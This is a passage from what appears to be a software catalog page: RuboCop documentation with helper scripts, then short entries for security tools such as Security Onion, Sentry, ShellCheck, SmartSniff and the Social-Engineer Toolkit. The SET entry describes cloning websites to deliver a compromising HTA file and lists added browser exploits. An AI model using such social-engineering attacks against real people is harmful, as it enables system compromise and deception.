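    next if d[:inline] # single-line scope; nothing to close
    d[:cops].each do |cop|
      if d[:action] == :disable
        open[cop] ||= d[:line]
      elsif cop == 'all'
        open.clear
      else
        open.delete(cop)
      end
    end
  end
  open
end

# Every cop name mentioned in any disable directive, for review.
def disabled_cops(source)
  parse_directives(source)
    .select { |d| d[:action] == :disable }
    .flat_map { |d| d[:cops] }
    .uniq.sort
end

# Constructed sample: two block disables, one of which is never re-enabled,
# plus one end-of-line disable that scopes to its own line only.
SAMPLE_SOURCE = <<~RUBY
  # rubocop:disable Metrics/LineLength, Style/StringLiterals
  greeting = "hello"
  # rubocop:enable Metrics/LineLength
  for x in (0..19) # rubocop:disable Style/AvoidFor
    puts x
  end
  # rubocop:disable Lint/UselessAssignment
  unused = 1
RUBY

if __FILE__ == $PROGRAM_NAME
  unclosed_disables(SAMPLE_SOURCE).each do |cop, line|
    puts "#{cop} disabled at line #{line} and never re-enabled"
  end
end
```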

Formatters
You can change the output format of RuboCop by specifying formatters with the -f/--format option. RuboCop ships with several built-in formatters, and also you can create your custom formatter.
Additionally the output can be redirected to a file instead of $stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable output and they are considered public APIs. The rest of the formatters are for humans, so parsing their outputs is discouraged.
You can enable multiple formatters at the same time by specifying -f/--format multiple times. The -o/--out option applies to the previously specified -f/--format, or the default progress format if no -f/--format is specified before the -o/--out option.

# Simple format to $stdout.
$ rubocop --format simple

# Progress (default) format to the file result.txt.
$ rubocop --out result.txt

# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final summary,
# so you'll mostly see the outputs from the progress formatter,
# and at the end the offense count summary will be outputted.
$ rubocop --format progress --format offenses

# Progress format to $stdout, and JSON format to the file rubocop.json.
$ rubocop --format progress --format json --out rubocop.json
#          ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#                 |                 |_______________|
#              $stdout

# Progress format to result.txt, and simple format to $stdout.
$ rubocop --output result.txt --format simple
#          ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
#                  |                 |
#           default format         $stdout

You can also load custom formatters.


Progress Formatter (default)
The default progress formatter outputs a character for each inspected file, and at the end it displays all detected offenses in the clang format. A . represents a clean file, and each of the capital letters means the severest offense (convention, warning, error or fatal) found in a file.

$ rubocop
Inspecting 26 files
..W.C....C..CWCW.C...WC.CC

Offenses:

lib/foo.rb:6:5: C: Missing top-level class documentation comment.
    class Foo
    ^^^^^

...

26 files inspected, 46 offenses detected
Clang Style Formatter
The clang formatter displays the offenses in a manner similar to clang:

$ rubocop test.rb
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
    ^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
  if something
  ^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
  if something
  ^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
    end
    ^^^

1 file inspected, 4 offenses detected

Fuubar Style Formatter
The fuubar style formatter displays a progress bar and shows details of offenses in the clang format as soon as they are detected. This is inspired by the Fuubar formatter for RSpec.

$ rubocop --format fuubar
lib/foo.rb.rb:1:1: C: Use snake_case for methods and variables.
def badName
    ^^^^^^^
lib/bar.rb:13:14: W: File.exists? is deprecated in favor of File.exist?.
    File.exists?(path)
         ^^^^^^^
 22/53 files |======== 43 ========>                    |  ETA: 00:00:02
Emacs Style Formatter
Machine-parsable
The emacs formatter displays the offenses in a format suitable for consumption by Emacs (and possibly other tools).

$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
Simple Formatter
The name of the formatter says it all :-)

$ rubocop --format simple test.rb
== test.rb ==
C:  1:  5: Use snake_case for method names.
C:  2:  3: Use a guard clause instead of wrapping the code inside a conditional expression.
C:  2:  3: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
W:  4:  5: end at 4, 4 is not aligned with if at 2, 2

1 file inspected, 4 offenses detected

File List Formatter
Machine-parsable
Sometimes you might want to just open all files with offenses in your favorite editor. This formatter outputs just the names of the files with offenses in them and makes it possible to do something like:

$ rubocop --format files | xargs vim

JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by passing the --format json option on the command line. The JSON structure is like the following example:
{
  "metadata": {
    "rubocop_version": "0.9.0",
    "ruby_engine": "ruby",
    "ruby_version": "2.0.0",
    "ruby_patchlevel": "195",
    "ruby_platform": "x86_64-darwin12.3.0"
  },
  "files": [{
      "path": "lib/foo.rb",
      "offenses": []
    }, {
      "path": "lib/bar.rb",
      "offenses": [{
          "severity": "convention",
          "message": "Line is too long. [81/80]",
          "cop_name": "LineLength",
          "corrected": true,
          "location": {
            "line": 546,
            "column": 80,
            "length": 4
          }
        }, {
          "severity": "warning",
          "message": "Unreachable code detected.",
          "cop_name": "UnreachableCode",
          "corrected": false,
          "location": {
            "line": 15,
            "column": 9,
            "length": 10
          }
        }
      ]
    }
  ],
  "summary": {
    "offense_count": 2,
    "target_file_count": 2,
    "inspected_file_count": 2
  }
}

Offense Count Formatter
Sometimes when first applying RuboCop to a codebase, it's nice to be able to see where most of your style cleanup is going to be spent.
With this in mind, you can use the offense count formatter to outline the offended cops and the number of offenses found for each by running:

$ rubocop --format offenses

87   Documentation
12   DotPosition
     AvoidGlobalVars
     EmptyLines
     AssignmentInCondition
     Blocks
     CommentAnnotation
     BlockAlignment
     IndentationWidth
     AvoidPerlBackrefs
     ColonMethodCall
--
134  Total
HTML Formatter
Useful for CI environments. It will create an HTML report like this.

$ rubocop --format html -o rubocop.html

Compatibility
RuboCop supports the following Ruby implementations:

MRI 1.9.3
MRI 2.0
MRI 2.1
MRI 2.2
JRuby in 1.9 mode
Rubinius 2.0+

Editor integration

Emacs
rubocop.el is a simple Emacs interface for RuboCop. It allows you to run RuboCop inside Emacs and quickly jump between problems in your code.
flycheck > 0.9 also supports RuboCop and uses it by default when available.

Vim
The vim-rubocop plugin runs RuboCop and displays the results in Vim.
There's also a RuboCop checker in syntastic.

Sublime Text
If you're a ST user you might find the Sublime RuboCop plugin useful.

Brackets
The brackets-rubocop extension displays RuboCop results in Brackets. It can be installed via the extension manager in Brackets.

TextMate2
The textmate2-rubocop bundle displays formatted RuboCop results in a new window. Installation instructions can be found here.

Atom
The atom-lint package runs RuboCop and highlights the offenses in Atom.
You can also use the linter-rubocop plugin for Atom's linter.

LightTable
The lt-rubocop plugin provides LightTable integration.

RubyMine
The rubocop-for-rubymine plugin provides basic RuboCop integration for RubyMine/IntelliJ IDEA.

Other Editors
Here's one great opportunity to contribute to RuboCop: implement RuboCop integration for your favorite editor.

Git pre-commit hook integration

overcommit is a fully configurable and extendable Git commit hook manager. To use RuboCop with overcommit, add the following to your .overcommit.yml file:

PreCommit:
  RuboCop:
    enabled: true

Guard integration
If you're fond of Guard you might like guard-rubocop. It allows you to automatically check Ruby code style with RuboCop when files are modified.

Rake integration
To use RuboCop in your Rakefile add the following:

require 'rubocop/rake_task'
RuboCop::RakeTask.new

If you run rake -T, the following two RuboCop tasks should show up:

rake rubocop                 # Run RuboCop
rake rubocop:auto_correct    # Auto-correct RuboCop offenses

The above will use default values. The task can be customized, for example:

require 'rubocop/rake_task'
desc 'Run RuboCop on the lib directory'
RuboCop::RakeTask.new(:rubocop) do |task|
  task.patterns = ['lib/**/*.rb']
  # only show the files with failures
  task.formatters = ['files']
  # don't abort rake on failure
  task.fail_on_error = false
end

Caching
Large projects containing hundreds or even thousands of files can take a really long time to inspect, but RuboCop has functionality to mitigate this problem. There's a caching mechanism that stores information about offenses found in inspected files.

Cache Validity
Later runs will be able to retrieve this information and present the stored information instead of inspecting the file again. This will be done if the cache for the file is still valid, which it is if there are no changes in:

the contents of the inspected file
RuboCop configuration for the file
the options given to rubocop, with some exceptions that have no bearing on which offenses are reported
the Ruby version used to invoke rubocop
version of the rubocop program (or to be precise, anything in the source code of the invoked rubocop program)

Enabling and Disabling the Cache
The caching functionality is enabled if the configuration parameter AllCops: UseCache is true, which it is by default. The command line option --cache false can be used to turn off caching, thus overriding the configuration parameter. If AllCops: UseCache is set to false in the local .rubocop.yml, then it's --cache true that overrides the setting.

Cache Path
By default, the cache is stored in a subdirectory of the temporary directory, /tmp/rubocop_cache/ on Unix-like systems. The configuration parameter AllCops: CacheRootDirectory can be used to set it to a different path. One reason to use this option could be that there's a network disk where users on different machines want to have a common RuboCop cache. Another could be that a Continuous Integration system allows directories, but not a temporary directory, to be saved between runs.

Cache Pruning
Each time a file has changed, its offenses will be stored under a new key in the cache. This means that the cache will continue to grow until we do something to stop it. The configuration parameter AllCops: MaxFilesInCache sets a limit, and when the number of files in the cache exceeds that limit, the oldest files will be automatically removed from the cache.

Extensions
It's possible to extend RuboCop with custom cops and formatters.

Loading Extensions
Besides the --require command line option you can also specify ruby files that should be loaded with the optional require directive in the .rubocop.yml file:

require:
  - ../my/custom/file.rb
  - rubocop-extension

Note: The paths are directly passed to Kernel.require. If your extension file is not in $LOAD_PATH, you need to specify the path as relative path prefixed with ./ explicitly, or absolute path.

Custom Cops
You can configure the custom cops in your .rubocop.yml just like any other cop.

Known Custom Cops
rubocop-rspec - RSpec-specific analysis

Custom Formatters
You can customize RuboCop's output format with custom formatters.

Creating Custom Formatter
To implement a custom formatter, you need to subclass RuboCop::Formatter::BaseFormatter and override some methods, or implement all formatter API methods by duck typing.
Please see the documents below for more formatter API details.

RuboCop::Formatter::BaseFormatter
RuboCop::Cop::Offense
Parser::Source::Range

Using Custom Formatter in Command Line
You can tell RuboCop to use your custom formatter with a combination of the --format and --require options. For example, when you have defined MyCustomFormatter in ./path/to/my_custom_formatter.rb, you would type this command:

$ rubocop --require ./path/to/my_custom_formatter --format MyCustomFormatter

Download Rubocop
SECURITY CHEATSHEETS - A COLLECTION OF CHEATSHEETS FOR VARIOUS INFOSEC TOOLS AND TOPICS

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Requirements

How to Use
In order to use these cheatsheets, the cheatsheets in this repository need to go into the ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

CheatSheets:

aircrack-ng
cewl
cidr
cookies
dig
fierce
ftp
http
https-ssl-tls
hydra
john
maltego
markdown
medusa
metasploit
mysql
ncat
nikto
nping
permissions
php
pivoting
ps
python
ruby
shadow
shodan
sqlmap
tcpdump
webservervulns
wireless-encryptions
wireshark

Download Security CheatSheets

SECURITY ONION - LINUX DISTRO FOR INTRUSION DETECTION, NETWORK SECURITY MONITORING, AND LOG MANAGEMENT

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools.

The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Analyze your NIDS/HIDS alerts with Squert
Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner
Use ELSA to slice and dice your logs
Access full packet capture with CapMe
Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic
Easy updates

Data Types
Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
Asset data from Prads and Bro
Full content data from netsniff-ng
Host data via OSSEC and syslog-ng
Session data from Argus, Prads, and Bro
Transaction data - http/ftp/dns/ssl/other logs from Bro

Download Security Onion
SECURITYSOFTVIEW - DISPLAYS THE ANTIVIRUS / ANTISPYWARE / FIREWALL REGISTERED WITH THE SECURITY CENTER OF WINDOWS

SecuritySoftView is a simple tool that displays the AntiVirus, AntiSpyware, and Firewall programs that are currently installed on your system and registered with the security center of Windows operating system.

System Requirements
This utility works on any version of Windows, starting from Windows XP and up to Windows 10. Both 32-bit and 64-bit systems are supported. However, on Windows XP, SecuritySoftView displays less information than Windows Vista or later.

Start Using SecuritySoftView
SecuritySoftView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - SecuritySoftView.exe
After running SecuritySoftView, the main window displays the list of all AntiVirus/AntiSpyware/Firewall programs that are currently registered with the security center of Windows operating system. Be aware that the same software might appear more than once, but with a different product type.

Command-Line Options

/stext <Filename>
Save the list of security programs into a simple text file.

/stab <Filename>
Save the list of security programs into a tab-delimited text file.

/scomma <Filename>
Save the list of security programs into a comma-delimited text file (csv).

/stabular <Filename>
Save the list of security programs into a tabular text file.

/shtml <Filename>
Save the list of security programs into HTML file (Horizontal).

/sverhtml <Filename>
Save the list of security programs into HTML file (Vertical).

/sxml <Filename>
Save the list of security programs into XML file.

Download SecuritySoftView
SENTRY - BRUTEFORCE ATTACK BLOCKER (SSH, FTP, SMTP, AND MORE)

Sentry detects and prevents bruteforce attacks against sshd using minimal system resources.

SAFE
To prevent inadvertent lockouts, Sentry manages a whitelist of IPs that have connected more than 3 times and succeeded at least once. Never again will that forgetful colleague behind the office NAT router get us locked out of our system. Nor the admin whose script just failed to login 12 times in 2 seconds.
Sentry includes support for adding IPs to a firewall. Support for IPFW, PF, ipchains is included. Firewall support is disabled by default. This is because firewall rules may terminate existing session(s) to the host (attn IPFW users). Get your IPs whitelisted (connect 3x or use --whitelist) before enabling the firewall option.

SIMPLE
Sentry has an extremely simple database for tracking IPs. This makes it very easy for administrators to view and manipulate the database using shell commands and scripts. See the EXAMPLES section.
Sentry is written in perl, which is installed everywhere you find sshd. It has no dependencies. Installation and deployment is extremely simple.

FLEXIBLE
Sentry supports blocking connection attempts using tcpwrappers and several popular firewalls. It is easy to extend sentry to support additional blocking lists.
Sentry was written to protect the SSH daemon but anticipates use with other daemons. SMTP support is planned. As this was written, the primary attack platform in use is bot nets comprised of exploited PCs on high-speed internet connections. These bots are used for carrying out SSH attacks as well as spam delivery. Blocking bots prevents multiple attack vectors.
The programming style of sentry makes it easy to insert code for additional functionality.

EFFICIENT
The primary goal of Sentry is to minimize the resources an attacker can steal, while consuming minimal resources itself.
Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter) expect to run as a daemon, tailing a log file. That requires a language interpreter to always be running, consuming at least 10MB of RAM. A single hardware node with dozens of virtual servers will lose hundreds of megs to daemon protection.
Sentry uses resources only when connections are made. The worst case scenario is the first connection made by an IP, since it will invoke a perl interpreter. For most connections, Sentry will append a timestamp to a file, stat for the presence of another file and exit.
Once an IP is blacklisted for abuse, whether by tcpd or a firewall, the resources it can consume are practically zero.
Sentry is not particularly efficient for reporting. The "one file per IP" is superbly minimal for logging and blacklisting, but nearly any database would perform better for reporting. Expect to wait a few seconds for sentry --report.

REQUIRED ARGUMENTS

ip
An IPv4 address. The IP should come from a reliable source that is difficult to spoof. Tcpwrappers is an excellent source. UDP connections are a poor source as they are easily spoofed. The log files of TCP daemons can be a good source if they are parsed carefully to avoid log injection attacks.

All actions except report and help require an IP address. The IP address can be manually specified by an administrator, or preferably passed in by a TCP server such as tcpd (tcpwrappers), inetd, or tcpserver (daemontools).

ACTIONS

blacklist
deny all future connections

whitelist
whitelist all future connections, remove the IP from the blacklists, and make it immune to future connection tests.

delist
remove an IP from the white and blacklists. This is useful for testing that sentry is working as expected.

connect
register a connection by an IP. The connect method will log the attempt and the time. See CONNECT.

update
Check the most recent version of sentry against the installed version and update if a newer version is available.

EXAMPLES

IP REPORT

$ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
9 connections from 24.19.45.95
and it is whitelisted

HOME GATEWAY REPORT

$ /var/db/sentry/sentry.pl -r
-------- summary --------
1614 unique IPs have connected 76525 times
1044 IPs are blacklisted
18 IPs are whitelisted

WEB SERVER REPORT

$ /var/db/sentry/sentry.pl -r
-------- summary --------
1240 unique IPs have connected 285554 times
40 IPs are blacklisted
4 IPs are whitelisted

EUROPEAN DNS MIRROR

$ /var/db/sentry/sentry.pl -r
-------- summary --------
3484 unique IPs have connected 15391 times
1127 IPs are blacklisted
6 IPs are whitelisted

Download Sentry
SET V6.5 - THE SOCIAL-ENGINEER TOOLKIT MR ROBOT

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.
The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 12 months since its release, Metasploit: The Penetration Tester's Guide written by TrustedSec's founder as well as Devon Kearns, Jim O'Gorman, and Mati Aharoni.

The next major revision of The Social-Engineer Toolkit (SET) v6.5 codename Mr Robot has just been released. The codename is in celebration of the TV show Mr Robot featuring SET last night! Kudos to them for having some amazing tech writers and appreciate the shoutout on the show.

This version incorporates a new HTA web attack vector (thanks to Justin Elze aka ginger for sharing the attack vector with me). This attack allows you to clone a website and inject an HTA file which compromises the system.
Additionally, SET added a lot of the new exploits including the hacking team adobe zero-day, and others from Metasploit.

Full changelog below:

~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

Supported platforms

Linux
Windows (experimental)

Download SET v6.5
SHELLCHECK - AUTOMATICALLY DETECTS PROBLEMS WITH SH/BASH SCRIPTS AND COMMANDS

ShellCheck is a static analysis and linting tool for sh/bash scripts. It's mainly focused on handling typical beginner and intermediate level syntax errors and pitfalls where the shell just gives a cryptic error message or strange behavior, but it also reports on a few more advanced issues where corner cases can cause delayed failures.
Haskell source code is available on GitHub!

Run ShellCheck online

SIMP - SYSTEM INTEGRITY MANAGEMENT PLATFORM

SIMP is a framework that aims to provide a reasonable combination of security compliance and operational flexibility. The ultimate goal of the project is to provide a complete management environment focused on compliance with the various profiles in the SCAP Security Guide Project and industry best practice.
Though it is fully capable out of the box, the intent of SIMP is to be molded to your target environment in such a way that deviations are easily identifiable to both Operations Teams and Security Officers.

Supported Operating Systems

The following Operating Systems are supported:

Red Hat Enterprise Linux 6.6 and 7.1
CentOS 6.6 and 7.1-1503-01

Technology components

SIMP uses Puppet to manage and maintain the configuration of the various component systems.
Though there are many possible configurations, out of the box SIMP provides:
Management: Puppet Server, PuppetDB, MCollective
Authentication: OpenLDAP
Kickstart/Update: YUM, DNS, DHCP, TFTP

SIMP Provided Materials

Build Materials
simp-core
simp-doc
simp-rsync
Puppet Modules
pupmod-simp-acpid

pupmod-simp-activemq
pupmod-simp-aide
pupmod-simp-apache
pupmod-simp-auditd
pupmod-simp-autofs
pupmod-simp-backuppc
pupmod-simp-cgroups
pupmod-simp-clamav
pupmod-simp-common
pupmod-simp-concat
pupmod-simp-dhcp
pupmod-simp-elasticsearch
pupmod-simp-freeradius
pupmod-simp-functions
pupmod-simp-ganglia
pupmod-simp-gfs2
pupmod-simp-iptables
pupmod-simp-jenkins
pupmod-simp-kibana
pupmod-simp-krb5
pupmod-simp-libvirt
pupmod-simp-logrotate
pupmod-simp-logstash
pupmod-simp-mcafee
pupmod-simp-mcollective
pupmod-simp-mozilla
pupmod-simp-multipathd
pupmod-simp-named
pupmod-simp-network
pupmod-simp-nfs
pupmod-simp-nscd
pupmod-simp-ntpd
pupmod-simp-oddjob
pupmod-simp-openldap
pupmod-simp-openscap
pupmod-simp-pam

pupmod-simp-pki
pupmod-simp-polkit
pupmod-simp-postfix
pupmod-simp-pupmod
pupmod-simp-rsync
pupmod-simp-rsyslog
pupmod-simp-site
pupmod-simp-selinux
pupmod-simp-shinken
pupmod-simp-simp
pupmod-simp-snmpd
pupmod-simp-ssh
pupmod-simp-sssd
pupmod-simp-stunnel
pupmod-simp-sudo
pupmod-simp-sudosh
pupmod-simp-svckill
pupmod-simp-sysctl
pupmod-simp-tcpwrappers
pupmod-simp-tftpboot
pupmod-simp-tpm
pupmod-simp-upstart
pupmod-simp-vnc
pupmod-simp-vsftpd
pupmod-simp-windowmanager
pupmod-simp-xinetd
pupmod-simp-xwindows
rubygem-simp-rake-helpers
rubygem-simp-cli

Forked External Modules

Most forks are simply to fit the materials into our build processes, but some have modifications that we are looking to push back upstream when possible.
augeasproviders
augeasproviders_apache
augeasproviders_base
augeasproviders_core
augeasproviders_grub
augeasproviders_mounttab
augeasproviders_nagios
augeasproviders_pam
augeasproviders_postgresql
augeasproviders_puppet
augeasproviders_shellvar
augeasproviders_ssh
puppet-elasticsearch
puppetlabs-apache
puppetlabs-postgresql
puppetlabs-stdlib
puppetlabs-inifile
puppetlabs-puppetdb
puppetlabs-mysql
puppetlabs-java
puppet-gpasswd
augeasproviders_sysctl
puppet-datacat
puppetlabs-java_ks
puppet-memcached

Download SIMP
SMARTSNIFF V2.16 - CAPTURE TCP/IP PACKETS ON YOUR NETWORK ADAPTER

SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as a sequence of conversations between clients and servers. You can view the TCP/IP conversations in ASCII mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP) or as a hex dump (for non-text based protocols, like DNS).
SmartSniff provides the following methods for capturing TCP/IP packets:
1. Raw Sockets (only for Windows 2000/XP or greater): allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems (see System Requirements below).
2. WinPcap Capture Driver: allows you to capture TCP/IP packets on all Windows operating systems (Windows 98/ME/NT/2000/XP/2003/Vista). In order to use it, you have to download and install the WinPcap Capture Driver from the WinPcap Web site (WinPcap is a free open-source capture driver). This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
3. Microsoft Network Monitor Driver (only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to install it manually, by using one of the following options:
   Option 1: install it from the CD-ROM of Windows 2000/XP according to the instructions on the Microsoft Web site.
   Option 2 (XP only): download and install the Windows XP Service Pack 2 Support Tools. One of the tools in this package is netcap.exe. When you run this tool for the first time, the Network Monitor Driver will automatically be installed on your system.
4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of the Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic. The new version of Microsoft Network Monitor (3.x) is available to download from the Microsoft Web site.

SYSTEM REQUIREMENTS

SmartSniff can capture TCP/IP packets on any version of the Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as the WinPcap capture driver is installed and works properly with your network adapter.
You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.
Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using the 'Raw Sockets' method. However, this capture method has some limitations and problems:
Outgoing UDP and ICMP packets are not captured.
On Windows XP SP1 outgoing packets are not captured at all, thanks to a Microsoft bug that appeared in the SP1 update. This bug was fixed in the SP2 update, but under Vista, Microsoft brought back the outgoing-packets bug of XP SP1.
On Windows Vista/7/8: be aware that the Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of the Windows operating system. If you only see the outgoing traffic, try to turn off the Windows firewall, or add smsniff.exe to the allowed programs list of the Windows firewall.

Download SmartSniff v2.16
SMARTSNIFF V2.17 - CAPTURE TCP/IP PACKETS ON YOUR NETWORK ADAPTER

SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as a sequence of conversations between clients and servers. You can view the TCP/IP conversations in ASCII mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP) or as a hex dump (for non-text based protocols, like DNS).
SmartSniff provides the following methods for capturing TCP/IP packets:
1. Raw Sockets (only for Windows 2000/XP or greater): allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
2. WinPcap Capture Driver: allows you to capture TCP/IP packets on all Windows operating systems (Windows 98/ME/NT/2000/XP/2003/Vista). In order to use it, you have to download and install the WinPcap Capture Driver from the WinPcap Web site (WinPcap is a free open-source capture driver). This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
3. Microsoft Network Monitor Driver (only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to install it manually, by using one of the following options:
   Option 1: install it from the CD-ROM of Windows 2000/XP according to the instructions on the Microsoft Web site.
   Option 2 (XP only): download and install the Windows XP Service Pack 2 Support Tools. One of the tools in this package is netcap.exe. When you run this tool for the first time, the Network Monitor Driver will automatically be installed on your system.
4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of the Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic. The new version of Microsoft Network Monitor (3.x) is available to download from the Microsoft Web site.
Notice: if WinPcap is installed on your system and you want to use the Microsoft Network Monitor Driver method, it's recommended to run SmartSniff with /NoCapDriver, because the Microsoft Network Monitor Driver may not work properly when WinPcap is loaded too.

Using SmartSniff

In order to start using SmartSniff, simply copy the executable (smsniff.exe) to any folder you like, and run it (installation is not needed).
After running SmartSniff, select "Start Capture" from the File menu, or simply click the green play button in the toolbar. If it's the first time that you use SmartSniff, you'll be asked to select the capture method and the network adapter that you want to use. If WinPcap is installed on your computer, it's recommended to use this method to capture packets.
After selecting the capture method and your network adapter, click the 'OK' button to start capturing TCP/IP packets. While capturing packets, try to browse some Web sites, or retrieve new emails from your email software. After stopping the capture (by clicking the red stop button) SmartSniff displays the list of all TCP/IP conversations that it captured. When you select a specific conversation in the upper pane, the lower pane displays the TCP/IP streams of the selected client-server conversation.
If you want to save the captured packets for viewing them later, use the "Save Packets Data To File" option from the File menu.
Display Mode

SmartSniff provides 3 basic modes to display the captured data: Automatic, ASCII, and Hex Dump. In Automatic mode (the default), SmartSniff checks the first bytes of the data stream: if it contains characters lower than 0x20 (excluding CR, LF and tab characters), it displays the data in Hex mode; otherwise, it displays it in ASCII mode.
You can easily switch between display modes by selecting them from the menu, or by using the F2 - F4 keys. Be aware that 'Hex Dump' mode is much slower than ASCII mode.
Starting from version 1.35, there is a new mode, 'URL List'. This mode only displays the list of URL addresses (http://...) found in the captured packets.
Exporting the captured data

SmartSniff allows you to easily export the captured data for use in other applications:
The upper pane: you can select one or more items in the upper pane, and then copy them to the clipboard (you can paste the copied items into Excel or into a spreadsheet of OpenOffice.org) or save them to a text/HTML/XML file (by using 'Save Packet Summaries').
The lower pane: you can select any part of the TCP/IP streams (or select all text, by using Ctrl+A), copy the selected text to the clipboard, and then paste it into Notepad, Wordpad, MS-Word or any other editor. When you paste the selected streams into a document of Wordpad, OpenOffice.org, or MS-Word, the colors are also transferred.
You can also export the TCP/IP streams to a text file, HTML file, or raw data file, by using the "Export TCP/IP Streams" option.

Capture and Display Filters

Starting from version 1.10, you can filter unwanted TCP/IP activity during the capture process (Capture Filter), or when displaying the captured TCP/IP data (Display Filter).
For both filter types, you can add one or more filter strings (separated by spaces or CRLF) in the following syntax:
[include | exclude] : [local | remote | both] : [tcp | udp | tcpudp | icmp | all] : [IP Range | Ports Range]
Here are some examples that demonstrate how to create a filter string:

Display only packets with remote TCP port 80 (Web sites):
include:remote:tcp:80

Display only packets with remote TCP port 80 (Web sites) and UDP port 53 (DNS):
include:remote:tcp:80
include:remote:udp:53

Display only packets originating from the following IP address range: 192.168.0.1 - 192.168.0.100:
include:remote:all:192.168.0.1-192.168.0.100

Display only TCP and UDP packets that use the following port range: 53 - 139:
include:both:tcpudp:53-139

Filter out most BitTorrent packets (port 6881):
exclude:both:tcpudp:6881

Filter out all ICMP packets (Ping/Traceroute activity):
exclude:both:icmp

Notice: a single filter string must not include spaces!
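Added example (Python; my own code, not SmartSniff's, which is closed source) that implements the filter syntax above as a matcher and runs it over four constructed conversations. The page gives the grammar and the examples but not the combination rule, so the following are assumptions: include filters act as a whitelist when any are present, exclude filters then veto; a fourth field containing a dot is an IPv4 range and otherwise a port range; an omitted fourth field (as in exclude:both:icmp) matches any address or port. An empty fourth field is rejected rather than treated as "any", so a filter that was split by a stray space fails loudly instead of silently widening.

```python
import ipaddress
from dataclasses import dataclass

# Protocol keyword in the filter grammar -> concrete protocols it covers.
PROTOS = {"tcp": {"tcp"}, "udp": {"udp"}, "tcpudp": {"tcp", "udp"},
          "icmp": {"icmp"}, "all": {"tcp", "udp", "icmp"}}


@dataclass
class Filter:
    action: str      # "include" or "exclude"
    side: str        # "local", "remote" or "both"
    protos: set      # concrete protocols covered
    kind: str        # "ip", "port" or "any" (no fourth field given)
    lo: int = 0
    hi: int = 0


def parse_filter(text):
    """Parse one 'action:side:proto[:range]' string; ValueError if malformed."""
    parts = text.split(":")
    if len(parts) not in (3, 4):
        raise ValueError(f"expected 3 or 4 fields: {text!r}")
    action, side, proto = (p.lower() for p in parts[:3])
    if action not in ("include", "exclude") or side not in ("local", "remote", "both"):
        raise ValueError(f"bad action or side: {text!r}")
    if proto not in PROTOS:
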